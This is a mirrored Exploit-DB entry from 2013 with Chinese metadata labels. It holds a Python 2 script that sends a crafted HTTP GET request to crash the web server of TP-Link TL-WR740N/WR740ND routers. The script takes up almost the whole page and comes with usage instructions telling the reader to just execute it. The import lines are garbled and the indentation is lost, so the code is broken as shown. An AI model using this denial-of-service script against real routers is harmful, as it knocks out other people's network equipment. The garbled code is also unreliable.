TP-Link TL-WR740N / TL-WR740ND 150M Wireless Lite N Router – HTTP Denial of Service

• Exploit Database
• 16 阅读

• 作者： Dino Causevic
  日期： 2013-11-30
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/29919/

• # Exploit title: 150M Wireless Lite N Router HTTP DoS
  # Date: 28.11.2013
  # Exploit Author: Dino Causevic
  # Hardware Link: http://www.tp-link.com/en/products/details/?model=TL-WR740N
  # Vendor Homepage: http://www.tp-link.com/
  # Contact: dincaus (packetstormsecurity.com)
  # CVE:
  # Firmware Version:	3.12.11 Build 120320 Rel.51047n
  # ===================================================================================================
  # Just execute Python script below
  # ===================================================================================================
  
  # Usage: python TP_Link_DoS.py <IP> <Port>
  
  # 150M Wireless Lite N Router, Model No. TL-WR740N / TL-WR740ND sending HTTP request with the headers inserted 
  # below in the script will crash HTTP Server. 
  
  #!/usr/bin/python
  import socket
  import import
  sys urllib2
  
  host = ""
  port = 0
  if(len(sys.argv) >= 2):
  host = sys.argv[1]
  port = sys.argv[2]
  else:
  print "Invalid number of the arguments."
  print "Usage <server> <port>"
  exit(1)
  
  
  print "Connecting on ",host,":",port
  
  s = socket.socket();
  stringOfDeath = "GET / HTTP/1.1\r\n";
  stringOfDeath = stringOfDeath + "Accept-Encoding: identity\r\n";
  stringOfDeath = stringOfDeath + "Host: "+ host + "\r\n";
  stringOfDeath = stringOfDeath + "Connection: close\r\n";
  stringOfDeath = stringOfDeath + "User-Agent: PythonLib/2.7\r\n";
  
  s.connect((host,int(port)))
  
  print "Sending packet..."
  s.send(stringOfDeath)
  print "Packet sent."
  print "Check if router http server down..."
  
  try:
  response = urllib2.urlopen("http://"+host+":"+port,None,5)
  response.read()
  except socket.timeout:
  print "Timeout occured, http server probaly down."
  exit(1)